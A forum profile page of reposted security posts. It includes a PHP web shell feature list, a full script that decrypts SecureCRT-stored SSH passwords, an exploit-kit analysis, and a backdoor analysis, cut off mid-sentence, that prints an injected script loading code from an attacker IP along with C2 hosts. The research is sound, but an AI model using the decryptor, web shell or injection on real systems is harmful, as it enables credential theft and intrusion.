Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. CCCP Shell CCCPShell is a PHP Shell written from scratch in my spare time. You will find in this shell Pure javascript (sessionStorage, serialize, ajax, append, remove, empty, change sort table order and dialogs modals) PHP zip with php code Full DB explorer (mysql, mssql, pgsql, oracle, sqlite, sqlite3, odbc and pdo) 21 icons for use in 94 file types CSS3 Easy to translate to another language via tText function WIP All the standard shell stuff Encrypted comunication (first phpshell in the world???) All tools Filemanager [+] Copy/paste (recursive) [+] In memory compress and download (recursive) [+] Delete (recursive) [+] Create file/folder [+] Fast view folder size/count objets [+] Fast file rename [+] Fast chmod [+] Fast change filedate [+] Create file/folder [!] View file information [+] Full Path [+] Size [+] MD5 [+] Chmod/Chown [+] Create time [+] Access time [+] Modify time[+] Hexdump preview/full [+] Highlight code [+] File Content [!] Edit [+] Change filetime [+] File Name [+] Change content Procs [+] Process viewer/info [+] Process killer SQL [+] Database explorer [+] Execute SQL code Info [+] Server info [+] PHP Info [+] Custom functions check External Connect [+] Back Connect [+] Bind Shell Execute [+] Eval PHP code [+] Execute (exec, shell_exec, system, passthru, popen and proc_open) Self remove WARNING This shell use atob an btob javascript functions. Read if your browser support it https://developer.mozilla.org/en-US/docs/Web/API/WindowBase64.atob Images Sursa: https://github.com/xchwarze/CCCPShell Via: TrojanForge
  2. Pentru un nou proiect ce presupune dezvoltare de aplicatii desktop pe MAC si Windows, clientul nostru isi doreste un Programator C++, cu experienta pe framework-ul Qt, care va face parte dintr-o echipa de 5 persoane. Postul este deschis atat in Bucuresti, cat si in sediul din Iasi. Cine e interesat sa imi dea PM.
  3. Va trimit mai multe informatii in legatura cu oportunitatea de Embedded Software Developer pentru locatia Bucuresti, pentru unul din proiectele noastre care activeaza in domeniul automotive. PM cine e interesat.
  4. Nu e asta ala de zicea ca el castiga 140 de milioane pe luna? E cumva in Amsterdam si a tras chestii dubioase?
  5. Da-ne mai multe detalii. Ce anume faci acolo? Ce limbaje cunosti? In ce limbaj lucrezi cel mai mult? Cine ti-a dat 40 de milioane initial? Cine iti dau 140 de milioane? E vorba de Romania? Cati ani ai? Cati ani de experienta ai? Ai pile la stat? Atat primesti in mana, adica salariu net?
  6. Super tare! Am castigat 10$ in doar 2 saptamani! BRB, imi iau DOUA pachete de tigari!
  7. Ba. Cine pula mea credeti ca sare pe voi cu banii? MUIE! Nu ati scris in viata voastra 200 de linii de cod si va asteptati la salariu de 50 de milioane. Porstilor. La inceput nu va da nimeni mai mult de 1500-2000 indiferent de limbaj. Mai ales ca te duci acolo cu un CV pe care scrie: "Vai, stiu 42 de limbaje de programare" si atat. Proiecte la care ai lucrat? Pula. Toate sunt rentabile. In orice limbaj poti castiga pana la 2000-2500 de euro pe luna. Dar asta cand ajungi Team Leader, Manager sau ai o alta functie de conducere. Intre timp, incepi cu 1500 RON (nici pe astia nu ii meritati) si cresti treptat. Sa zicem asa: 1500 RON - cam 6 luni -1 an. Ajungi apoi pe la 20 si ceva de milioane, apoi 30 de milioane. Si dupa macar 2 ani de experienta sa aveti bunul simt sa cereti mai mult de atat. Se poate creste si mai rapid, depinde de firma la care ajungeti si cat de buni sunteti. Nu va mai luati dupa ce spun altii ca ei castiga 80 de milioane pe luna. Se castiga, dar dupa multi ani de munca. Ala a muncit poate 5 ani sa ajunga la salariul asta, voi ati dat 5 ani la laba, nu ati facut nimic si mergeti la interviuri mirandu-va ca va scot aia pe usa cand discutati de salariu. Cat despre limbajul de programare, alegerea e simpla: alege ce iti place. Intotdeauna o sa fii bun in ceea ce iti place sa faci. Asa cum esti bun la jucat jocuri de cacat, asa o sa fii bun in C++ daca iti place asta. Dar inainte de a va gandi macar sa va angajati, faceti-va CV-ul si ganditi-va ca aveti o firma si vine un pusti cu acel CV la voi si discutati de salariu. Asa o sa va dati seama cat meritati. Nota: Daca sunteti olimpici sau buni in ceva puteti castiga din start mai mult. Sa zicem ca luati din start 40 de milioane pe luna. Dar asta vine cu alte neajunsuri la pachet: 1. NU o sa vedeti o marire de salariu 2. NU aveti voie sa plecati de la firma respectiva timp de 2 ani E doar un caz, mai mult sau mai putin real. Daca o firma va ofera salariu mare, fiti siguri ca ceva nu este in regula si cititi contractul inainte de a-l semna. @2time - Care a fost primul tau salariu? @gogusan - Ti-au dat tie primul salariu atat pe Java? Aici e vorba de primul salariu. Nu mai veniti aici cu astfel de numere sa le faceti iluzii copiilor. Nota: O ruda de-a mea castiga 1500 RON pe luna ca femeie de serviciu. Programarea nu mai e ceea ce era acum cativa ani. Sunt MII de oameni ba, MII de oameni care termina o facultate de profil (daca nu ai facut Universitatea sau Politehnica in Bucuresti nu se uita nimeni la CV-ul taude Spiru Harte). Ce-i drept, majoritatea sunt niste cacati care nu invata nimic si doar se asteapta la miliarde pentru ca termina o facultate de cacat. Dar pentru angajator conteaza ca vine un cacat dintr-asta si cere cu 3 milioane pe luna mai putin. Asadar: 1. Lucrati la proiecte. Lasati laba, serialele si jocurile. Munciti! Construiti-va un CV, sa aveti ce arata aluia cand ziceti ca vreti o gramada de bani de la el. 2. Faceti o facultate buna. Nu Spiru Haretu pulii sau altceva. Conteaza mai mult decat credeti. 3. Invatati! La facultate sau acasa, invatati pentru ca la interviu se pun intrebari tehnice, interviuri care dureaza chiar si 3-4 ore. Nu va mai luati dupa toti prostii care posteaza aici, care au 15 ani si traiesc pe banii parintilor.
  8. Decrypt SSHv2 passwords stored in VanDyke SecureCRT #!/usr/bin/env python# # Decrypt SSHv2 passwords stored in VanDyke SecureCRT session files # Can be found on Windows in: # %APPDATA%\VanDyke\Config\Sessions\sessionname.ini # Tested with version 7.2.6 (build 606) for Windows # Eloi Vanderbeken - Synacktiv from Crypto.Cipher import Blowfish import argparse import re def decrypt(password) : c1 = Blowfish.new('5F B0 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 82 B7'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8) c2 = Blowfish.new('24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 AA 07'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8) padded = c1.decrypt(c2.decrypt(password.decode('hex'))[4:-4]) p = '' while padded[:2] != '\x00\x00' : p += padded[:2] padded = padded[2:] return p.decode('UTF-16') REGEX_HOSTNAME = re.compile(ur'S:"Hostname"=([^\r\n]*)') REGEX_PASWORD = re.compile(ur'S:"Password"=u([0-9a-f]+)') REGEX_PORT = re.compile(ur'D:"\[sSH2\] Port"=([0-9a-f]{8})') REGEX_USERNAME = re.compile(ur'S:"Username"=([^\r\n]*)') def hostname(x) : m = REGEX_HOSTNAME.search(x) if m : return m.group(1) return '???' def password(x) : m = REGEX_PASWORD.search(x) if m : return decrypt(m.group(1)) return '???' def port(x) : m = REGEX_PORT.search(x) if m : return '-p %d '%(int(m.group(1), 16)) return '' def username(x) : m = REGEX_USERNAME.search(x) if m : return m.group(1) + '@' return '' parser = argparse.ArgumentParser(description='Tool to decrypt SSHv2 passwords in VanDyke Secure CRT session files') parser.add_argument('files', type=argparse.FileType('r'), nargs='+', help='session file(s)') args = parser.parse_args() for f in args.files : c = f.read().replace('\x00', '') print f.name print "ssh %s%s%s # %s"%(port©, username©, hostname©, password©)
  9. Foloseste-l dintr-o masina virtuala. Si ESTE un keylogger.
  10. Zeroing buffers is insufficient On Thursday I wrote about the problem of zeroing buffers in an attempt to ensure that sensitive data (e.g., cryptographic keys) which is no longer wanted will not be left behind. I thought I had found a method which was guaranteed to work even with the most vexatiously optimizing C99 compiler, but it turns out that even that method wasn't guaranteed to work. That said, with a combination of tricks, it is certainly possible to make most optimizing compilers zero buffers, simply because they're not smart enough to figure out that they're not required to do so — and some day, when C11 compilers become widespread, the memset_s function will make this easy. There's just one catch: We've been solving the wrong problem. With a bit of care and a cooperative compiler, we can zero a buffer — but that's not what we need. What we need to do is zero every location where sensitive data might be stored. Remember, the whole reason we had sensitive information in memory in the first place was so that we could use it; and that usage almost certainly resulted in sensitive data being copied onto the stack and into registers. Now, some parts of the stack are easy to zero (assuming a cooperative compiler): The parts which contain objects which we have declared explicitly. Sensitive data may be stored in other places on the stack, however: Compilers are free to make copies of data, rearranging it for faster access. One of the worst culprits in this regard is GCC: Because its register allocator does not apply any backpressure to the common subexpression elimination routines, GCC can decide to load values from memory into "registers", only to end up spilling those values onto the stack when it discovers that it does not have enough physical registers (this is one of the reasons why gcc -O3 sometimes produces slower code than gcc -O2). Even without register allocation bugs, however, all compilers will store temporary values on the stack from time to time, and there is no legal way to sanitize these from within C. (I know that at least one developer, when confronted by this problem, decided to sanitize his stack by zeroing until he triggered a page fault — but that is an extreme solution, and is both non-portable and very clear C "undefined behaviour".) One might expect that the situation with sensitive data left behind in registers is less problematic, since registers are liable to be reused more quickly; but in fact this can be even worse. Consider the "XMM" registers on the x86 architecture: They will only be used by the SSE family of instructions, which is not widely used in most applications — so once a value is stored in one of those registers, it may remain there for a long time. One of the rare instances those registers are used by cryptographic code, however, is for AES computations, using the "AESNI" instruction set. It gets worse. Nearly every AES implementation using AESNI will leave two values in registers: The final block of output, and the final round key. For encryption operations these aren't catastrophic things to leak — the final block of output is ciphertext, and the final AES round key, while theoretically dangerous, is not enough on its own to permit an attack on AES — but the situation is very different for decryption operations: The final block of output is plaintext, and the final AES round is the AES key itself (or the first 128 bits of the key for AES-192 and AES-256). I am absolutely certain that there is software out there which inadvertantly keeps an AES key sitting in an XMM register long after it has been wiped from memory. As with "anonymous" temporary space allocated on the stack, there is no way to sanitize the complete CPU register set from within portable C code — which should probably come as no surprise, since C, being designed to be a portable language, is deliberately agnostic about the registers and even the instruction set of the target machine. Let me say that again: It is impossible to safely implement any cryptosystem providing forward secrecy in C. If compiler authors care about security, we need a new C language extension. After discussions with developers — of both cryptographic code and compilers — over the past couple of years I propose that a function attribute be added with the following meaning: "This function handles sensitive information, and the compiler must ensure that upon return all system state which has been used implicitly by the function has been sanitized." While I am not a compiler developer, I don't think this is an entirely unreasonable feature request: Ensuring that registers are sanitized can be done via existing support for calling conventions by declaring that every register is callee-save, and sanitizing the stack should be easy given that that compiler knows precisely how much space it has allocated. With such a feature added to the C language, it will finally be possible — in combination with memset_s from C11 — to write code which obtains cryptographic keys, uses them without leaking them into other parts of the system state, and then wipes them from memory so that a future system compromise can't reveal the keys. People talk a lot about forward secrecy; it's time to do something about it. But until we get that language extension, all we can do is hope that we're lucky and our leaked state gets overwritten before it's too late. That, and perhaps avoid using AESNI instructions for AES-128 decryptions. Sursa: Zeroing buffers is insufficient
  11. Copyright Duarte Monteiro (etraud123) JSPwn Nishant Das Patnaik (nishant.dp@) JsPrime Paul Theriault (pauljt) Scanjs JSpwn JavaScript Static Code Analysis JSPwn is a modified version of Scanjs + JSPrime. This tool allow the developers to detect Sinks And Sources of their Applications and find XSS vulnerabilities and DOM XSS (Beta). With the engine of ScanJS to detect vulnerabilities and the code flux feature of JSprime, this app has the compatibility of detect the vulnerabilities point and backtrack the code. Example Open app: node server.js; Go to: http://localhost:4000/client/#/scan; Select File from folder; Enable REGEXP Custom; Link: https://github.com/Etraud123/JSpwn
  12. [h=3]Nuclear Exploit Kit and Flash CVE-2014-0515[/h] For this blog, we'd like to walk you through a recent attack involving Nuclear Exploit Kit (EK) that we analyzed. It was found leveraging CVE-2014-0515, a buffer overflow in Adobe Flash Player discovered in April 2014. Nuclear Exploit kit targets a number of known vulnerabilities including: pdf - PDF:Exploit.PDF-JS swf - CVE-2014-0515 jar - CVE-2012-0507 Below are the files which were downloaded during the exploitation attempts observed: [TABLE] [TR] [TD]FILE TYPE[/TD] [TD]MD5[/TD] [TD]SIZE[/TD] [TD]CVE/THREAT[/TD] [TD]VT HITS[/TD] [/TR] [TR] [TD]FLASH[/TD] [TD]A1465ECE32FA3106AA88FD666EBF8C78[/TD] [TD=align: right]5614[/TD] [TD]CVE-2014-0515[/TD] [TD]18 / 53[/TD] [/TR] [TR] [TD]JAR[/TD] [TD]A93F603A95282B80D8AFD3F23C4D4889[/TD] [TD=align: right]12396[/TD] [TD]CVE-2012-0507[/TD] [TD]26 / 54[/TD] [/TR] [TR] [TD]PDF[/TD] [TD]19ED55EF17A49451D8052D0B51C66239[/TD] [TD=align: right]9770[/TD] [TD]Exploit.PDF-JS[/TD] [TD]22 / 54[/TD] [/TR] [TR] [TD]EXE[/TD] [TD]8BCE8A59F9E789BEFB9D178C9A03FB66[/TD] [TD=align: right]104960[/TD] [TD]Win32/Zemot[/TD] [TD]39 / 53[/TD] [/TR] [/TABLE] Although there are other associated vulnerabilities that are being exploited by Nuclear Exploit kit, we will limit this blog post to reviewing the Flash exploitation (CVE-2014-0515). Nuclear EK Landing Unlike other EKs such as RIG, Nuclear EK's landing page code is highly obfuscated. (Fig 1: Obfuscated Landing Page) After de-obfuscation, the page looks as follows: (Fig 2: De-Obfuscated Landing Page) Nuclear EK's landing page checks for the following antivirus (AV) driver files and if finds any, terminates the exploitation process. We have seen these checks before in RIG EK too. (Fig 3: Check for AV driver files) If this AV check is passed, a javascript function then checks the installed Flash version and if a vulnerable version is detected on the client's browser, a call is then made to a dynamic Flash object creation module. (Fig 4: Flash Call) Here are the vulnerable Flash player checks: (Fig 5: Checks if vulnerable version installed) If the version check passes, the Flash exploitation process will commence as seen below. CVE-2014-0515 exploit analysis Here is the code that dynamically creates a new Flash Object: (Fig 6: Flash Object Creation) The Flash exploit payload that gets downloaded is highly obfuscated to evade AV detection. Below is a snippet of decompiled code from this Flash exploit: (Fig 7: Decompiled Flash File) There are two hard coded snippets of obfuscated shellcode in the action script as seen below: (Fig x1,x2: Raw Shellcodes) After de-obfuscating on the run time, it adds bytecode to a Shader Object from one of the de-obfuscated shell code snippets. (Fig 8: Shader Byte Code Filler) The Shader's Pixel Bender is where this malformed byte code is written, which triggers the vulnerability. Here is the Malformed byte code: (Fig 9: Malformed data for Pixel Shader) Disassembling Pixel Bender's byte code We used Tinc Uro's program to get the PixelBender binary data decompiled. (Fig 10: Decompiled PixelBender data) We can see the inappropriate content here. The Shader Object takes a float parameter whose default value is set to a matrix of 4x4 floats and the second float value of this matrix is invalid value triggering the vulnerability. Conclusion Since the downfall of the popular Blackhole Exploit Kit, we have seen the advent of many new Exploit Kits. Nuclear Exploit Kit definitely ranks in the Top 5 prevalent EKs in the wild at the moment. We have seen an increasing number of compromised sites and scam pages leading to Nuclear Exploit Kit in past three months. Some of the notable compromised sites during this time frame that were redirecting to Nuclear EK includes: SocialBlade.com - A youtube statistics tracking site. AskMen.com - Men's entertainment website Facebook.com survey scam pages Exploit kits generally make use of known vulnerabilities and Flash is a popular target. CVE-2014-0515 in particular targets a Flash vulnerability in Flash versions before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux. It's critical to ensure that your employees aren't running outdated versions of Flash as it is commonly targeted by EKs. References: Adobe ActionScript® 3 (AS3) API Reference http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf kaourantin.net: Pixel Bender .pbj files JPEXS Free Flash Decompiler - Download Malware-Traffic-Analysis.net - Rubin Azad Sursa: Zscaler Research: Nuclear Exploit Kit and Flash CVE-2014-0515
  13. Forced to Adapt: XSLCmd Backdoor Now on OS X September 4, 2014 | By James T. Bennett and Mike Scott Introduction FireEye Labs recently discovered a previously unknown variant of the APT backdoor XSLCmd – OSX.XSLCmd – which is designed to compromise Apple OS X systems. This backdoor shares a significant portion of its code with the Windows-based version of the XSLCmd backdoor that has been around since at least 2009. This discovery, along with other industry findings, is a clear indicator that APT threat actors are shifting their eyes to OS X as it becomes an increasingly popular computing platform. Across the global threat landscape, there has been a clear history of leveraging (or porting) Windows malware to the Apple OS X platform. In 2012, AlienVault discovered a document file exploiting an older vulnerability in Microsoft Word that installs a backdoor named “MacControl” on OS X systems. The group responsible for those attacks had been targeting Tibetan non-government organizations (NGOs). It was later discovered that the code for this backdoor was borrowed from an existing Windows backdoor, whose source code can be found on several Chinese programming forums. In 2013, Kaspersky reported on a threat actor group they named “IceFog” that had been attacking a large number of entities related to military, mass media, and technology in South Korea and Japan. This group developed their own backdoor for both Windows and OS X. And just this year, Kaspersky published a report on a group they named “Careto/Mask” that utilized an open source netcat-like project designed to run on *nix and Windows systems named ‘sbd’ which they wrapped in a custom built installer for OS X. Based on our historical intelligence, we believe the XSLCmd backdoor is used by APT, including a group that we call “GREF.” We track this threat group as “GREF” due to their propensity to use a variety of Google references in their activities – some of which will be outlined later in this report. Our tracking of GREF dates back to at least the 2009 timeframe, but we believe they were active prior to this time as well. Historically, GREF has targeted a wide range of organizations including the US Defense Industrial Base (DIB), electronics and engineering companies worldwide, as well as foundations and other NGO’s, especially those with interests in Asia. XSLCmd for OS X Analysis The XSLCmd backdoor for OS X was submitted to VirusTotal (MD5: 60242ad3e1b6c4d417d4dfeb8fb464a1) on August 10, 2014, with 0 detections at the time of submission. The sample is a universal Mach-O executable file supporting the PowerPC, x86, and x86-64 CPU architectures. The code within contains both an installation routine that is carried out the first time it is executed on a system, and the backdoor routine which is carried out after confirming that its parent process is launchd (the initial user mode process of OS X that is responsible for, amongst other things, launching daemons). The backdoor code was ported to OS X from a Windows backdoor that has been used extensively in targeted attacks over the past several years, having been updated many times in the process. Its capabilities include a reverse shell, file listings and transfers, installation of additional executables, and an updatable configuration. The OS X version of XSLCmd includes two additional features not found in the Windows variants we have studied in depth: key logging and screen capturing. Installation Routine To install, XSLCmd first determines the endianness of the CPU using NXGetLocalArchInfo and whether or not it is running as the super user by comparing the return value of getuid()with 0. The code includes functions to handle endianness differences when dealing with file and network data on a system using big endian, namely older Apple computers that shipped with PowerPC CPUs. The process copies its Mach-O from its current location to $HOME/Library/LaunchAgents/clipboardd and creates a plist file in the same directory with the name com.apple.service.clipboardd.plist. The latter file ensures that the backdoor is launched after the system is rebooted once the user logs in. After this is done, the malware relaunches itself using the ‘load’ option of the launchctl utility, which runs the malware according to its configuration in the plist file it created, with launchd as its parent process. This is the process that begins the actual backdoor routine of waiting for and executing commands issued from the C2 server. After running itself with launchctl, the initial process forks and deletes the Mach-O from the original location from which it was executed. The installation routine differs slightly depending on whether or not the process is running with super user privileges. If run as super user, it copies itself to /Library/Logs/clipboardd. Interestingly, if run as super user, the process will also copy /bin/ksh to /bin/ssh. /bin/ksh is the Korn shell executable, and if the user sends a command to initialize a reverse shell, it will use the copy of ksh to do so instead of /bin/bash. This is likely done to make it less obvious that a reverse shell is running on the system, since it may raise less suspicion to see an ssh process opening a network socket rather than a bash process, although the real ssh executable is actually located in /usr/bin/ssh, not /bin/ssh. A list of possible files created by XSLCmd is included in Appendix 1 at the end of this blog. Configuration Options XSLCmd ships with an encrypted configuration file that it defaults to if there is no configuration file written to disk. It will only write its configuration file to disk if it’s updated by the user. It runs in a loop, checking for a configuration update, and then checking for commands. If a new configuration is available, it will be written to disk in base64 encoding at $HOME/.fontset/pxupdate.ini. Below is the configuration data stored in the XSLCmd sample we obtained. [ListenMode] 0 [MServer] 61.128.110.38:8000 [bServer] 61.128.110.38 [Day] 1,2,3,4,5,6,7 [start Time] 00:00:00 [End Time] 23:59:00 [interval] 60 [MWeb] http://1234/config.htm [bWeb] http://1234/config.htm [MWebTrans] 0 [bWebTrans] 0 [FakeDomain] www.appleupdate.biz [Proxy] 0 [Connect] 1 [update] 0 [updateWeb] not use [MServer] and [bServer] specify the main and backup C2 server addresses, which can be either an IP address or domain name. Only [MServer] needs to specify a port. [Day] specifies which days of the week the malware will poll for commands and configuration updates on where Monday is 1. [start Time] specifies the local time of day to begin polling. [End Time] specifies the local time of day to stop polling. [interval] specifies the number of seconds between polls. [MWeb] and [bWeb] specify the main and backup URLs to poll for configuration updates, respectively. Update checks are not performed if these values are left to their default: http://1234/config.htm Other options will be explained where appropriate later in the blog. C2 Protocol XSLCmd uses pseudo-HTTP for its protocol. It opens a socket and uses a string template to setup the HTTP request or response headers depending on whether or not it was configured for [Listen Mode]. If [Listen Mode] is set to 1, then it listens on its socket, waiting for a connection for which it will reply to with HTTP response headers following this template: HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Server: Apache/2.0.54 (Unix) Content-Encoding: gzip Content-Length: %d The body after the headers, regardless of mode, will contain data specific to the purpose of the communication. The data is encrypted with a scheme lifted from a game server engine written by a group named “My Destiny Team.” The request headers have an interesting feature where the Host and Referer header values will have their domain values populated with the value stored in [Fake Domain]. This value can be any string and has no effect on the network connection established. The value of the ‘s’ argument in the request URL is randomly generated, and all of the other request header values except for Content-Length are hard-coded. Another interesting feature exists for the configuration update function. If [MWebTrans]/[bWebTrans] is set to 1, the configuration update URL request will be proxied through Yahoo’s Babelfish service and will fall back to the Google Translate service if that fails. As you can see, the ‘trurl’ parameter in the URL will be set to whatever is configured for [MWeb]/[bWeb]. The User-Agent header for this request is hard-coded and contains the computer name in the parentheses at the end. SSL certificate strings were noticed during our analysis, but with no direct cross-reference to the certificate data. However, there was a cross-reference to the data directly preceding it. This data began with what looked like SSL handshake headers, so we extracted the data from the executable, wrapped it in a PCAP file, and opened it in Wireshark. Interestingly, the data contains everything needed for the server-side packets of an SSL handshake. The SSL certificate being used was for login.live.com and had expired on 6/16/2010. The code using this data opens a socket, waits for a connection, and proceeds to carry out an SSL handshake with the client, throwing away whatever data it receives. This code is not directly referenced by any other code in the executable but could very well replace the [Listen Mode] code. Perhaps it is an old feature no longer in use, a new feature yet to be fully implemented, or an optional feature only used in certain cases. Observations We noticed a mix of manually constructed and plain referenced strings throughout the code, sometimes side-by-side in the same function even. This gives the impression of someone working with someone else’s code, adding his own touch and style here and there as he goes. Also of note is that XSLCmd will not perform key logging if run as super user. This can be a problem, because the API used to perform the key logging, CGEventTapCreate, when invoked with the parameters it uses, requires root permissions from the calling process or the “Assistive Devices” feature must be enabled for the application. During the initial installation, there is a routine to programmatically enable assistive devices that will be executed if the OS X version is not 10.8. In 10.9, enabling assistive devices permissions is done on a per application basis with no direct API to achieve this. It is interesting to note that the version check does not account for versions above 10.8, indicating that perhaps 10.8 was the latest version at the time the code was written, or at least the most common. Further supporting this inference is the lack of testing performed on 10.9. This variant uses an API from the private Admin framework that is no longer exported in 10.9, causing it to crash. The effort to support PowerPC with the endian conversion functions is worth mentioning. Coupling this observation with the aforementioned fact that elsewhere in the code, the version of OS X is compared with 10.8, one could deduce that efforts were made to be backwards compatible with older OS X systems. For some frame of reference, Apple’s first OS to drop support for PowerPC was OS X 10.6 released in 2009, and OS X 10.9 was released in October of 2013. Threat Actor Intelligence Historical Background While GREF’s targeting interests overlap with many of the other threat groups we track, their TTP’s are somewhat unique. GREF is one of the few APT threat groups that does not rely on phishing as their primary attack method. While they have been known to utilize phishing emails, including malicious attachments and links to exploit sites, they were one of the early adopters of strategic web compromise (SWC) attacks. GREF was especially busy in the 2010 timeframe, during which they had early access to a number of 0-day exploits including CVE-2010-0806 (IE 6-7 Peer Objects vuln), CVE-2010-1297 (Adobe Flash vuln), and CVE-2010-2884 (Adobe Flash) that they leveraged in both phishing and SWC attacks. Many of their SWC attacks we saw in this time period were hosted on defense industry-related sites including Center for Defense Information (cdi.org), National Defense Industrial Association (ndia.org), Interservice/Industry Training, Simulation and Education Conference (iitsec.org), and satellite company Millennium Space Systems (millennium-space.com). Most of those attacks involved embedding links to exploit code in the homepage of the affected website, and true to their moniker the link was usually placed inside an existing Google Analytics code block in the page source code to help obscure it, rather than simply appended to the end of the file like many other attackers did. Figure 1: Sample “google” exploit link <!— Google Tracking Code —> <script type=”text/javascript”> var gaJsHost = ((“https:” == document.location.protocol) ? “https://ssl.” : “http://”); document.write(unescape(“%3Cscript src=’” + gaJsHost + “180.149.252.181/wiki/tiwiki.ashx’ type=’text/javascript’%3E%3C/script%3E”)); </script> The TTP that most differentiates GREF from other APT threat groups is their unrelenting targeting of web server vulnerabilities to both gain entry to targeted organizations, as well as to get new platforms for SWC attacks. This threat group appears to devote more resources (than most other groups) in attempting to penetrate web servers, and generally, they make no attempt to obscure the attacks, often generating gigabytes of traffic in long-running attacks. They are known to utilize open-source tools such as SQLMap to perform SQL injection, but their most obvious tool of choice is the web vulnerability scanner Acunetix, which leaves tell-tale request patterns in web server logs. They have been known to leverage vulnerabilities in ColdFusion, Tomcat, JBoss, FCKEditor, and other web applications to gain access to servers, and then they will commonly deploy a variety of web shells relevant to the web application software running on the server to access and control the system. Another historical TTP attributed to GREF was their frequent re-use of specific IP ranges to both perform reconnaissance and launch their attacks, as well as for command and control and exfiltration of data. In the early years, we documented them routinely using IP addresses in the 210.211.31.x (China Virtual Telecom – Hong Kong), 180.149.252.x (Asia Datacenter – Hong Kong), and 120.50.47.x (Qala – Singapore). In addition, their reconnaissance activities frequently included referrer headers from google.com and google.com.hk with search features such as “inurl” and “filetype” looking for specific systems, technologies, and known vulnerabilities. C2 Domains GREF is known to have sometimes configured their malware to bare IP addresses, rather than domains, but there are some clusters of domain registrants that we attribute to them. Table 1: GREF domain registrations [TABLE] [TR] [TD]Domain[/TD] [TD=width: 221]Registrant Email Address[/TD] [/TR] [TR] [TD=width: 221]allshell[.]net[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]attoo1s[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]kasparsky[.]net[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]kocrmicrosoft[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]microsoft.org[.]tw[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]microsoftdomainadmin[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]microsoftsp3[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]playncs[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]softwareupdatevmware[.]com[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]windowsnine[.]net[/TD] [TD=width: 221]cooweb51[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]cdngoogle[.]com[/TD] [TD=width: 221]metasploit3[@]google.com[/TD] [/TR] [TR] [TD=width: 221]cisco-inc[.]net[/TD] [TD=width: 221]metasploit3[@]google.com[/TD] [/TR] [TR] [TD=width: 221]mremote[.]biz[/TD] [TD=width: 221]metasploit3[@]google.com[/TD] [/TR] [TR] [TD=width: 221]officescan[.]biz[/TD] [TD=width: 221]metasploit3[@]google.com[/TD] [/TR] [TR] [TD=width: 221]oprea[.]biz[/TD] [TD=width: 221]metasploit3[@]google.com[/TD] [/TR] [TR] [TD=width: 221]battle.com[.]tw[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]diablo-iii[.]mobi[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]microsoftupdate[.]ws[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]msftncsl[.]com[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]square-enix[.]us[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]updatamicrosoft[.]com[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]powershell.com[.]tw[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]gefacebook[.]com[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]attoo1s[.]com[/TD] [TD=width: 221]6g8wkx[@]gmail.com[/TD] [/TR] [TR] [TD=width: 221]msnupdate[.]bz[/TD] [TD=width: 221]skydrive1951[@]hotmail.com[/TD] [/TR] [TR] [TD=width: 221]googlemapsoftware[.]com[/TD] [TD=width: 221]skydrive1951[@]hotmail.com[/TD] [/TR] [/TABLE] XSLCmd Usage For the majority of the time we’ve been tracking them, XSLCmd has been the “go-to” backdoor for GREF, as shown by the wide range of compile dates for the Windows samples we have: from 2009-01-05 to 2013-08-01. Appendix 2 provides a partial list of Windows sample hashes and configuration metadata. Since Mach-O binaries do not have a compile timestamp like Windows executables, we can only infer from other data when the OS X variant was developed. As mentioned above, the “FakeDomain” was configured to “www.appleupdate[.]biz”, which was originally registered on August 2, 2012, and the registration appears to have updated on August 7, 2014, but the registrant is still the same “cast west”. When we found the sample on August 10, the domain did not resolve and there were no historical records for appleupdate[.]biz in any of the passive DNS (pDNS) sources we checked. In the intervening weeks, it has been seen by pDNS sensors, with the first query occurring on August 12, 2014 (which could be related to our research, since the hits are ‘nxdomain’), and then on August 16, 2014 there are pDNS records pointing to 61.128.110.38, which you’ll notice is the same IP the OS X version was configured to use. This could hint at the possibility that this OS X port of XSLCmd was recently developed and deployed; however, this remains uncertain. Other Backdoor Usage In addition to XSLCmd, GREF has utilized a number of other backdoors over time. Another backdoor unique to them, which we call “ddrh”, is a limited-feature backdoor that was frequently dropped in the SWC attacks in 2010, but has not been seen much since. Another historical backdoor attributed to GREF is one known as ERACS or Trojan.LURKER (not to be confused with LURK0 variant of Gh0st). This full-featured backdoor includes the usual backdoor functionality, including the support for additional modules, but it also includes a USB monitoring capability that generates a directory listing of USB-connected devices. We have also observed GREF using a handful of other common backdoors including Poison Ivy, Gh0st, 9002/HOMEUNIX, HKDoor, and Briba, but these occurrences have been pretty rare. All of the GREF 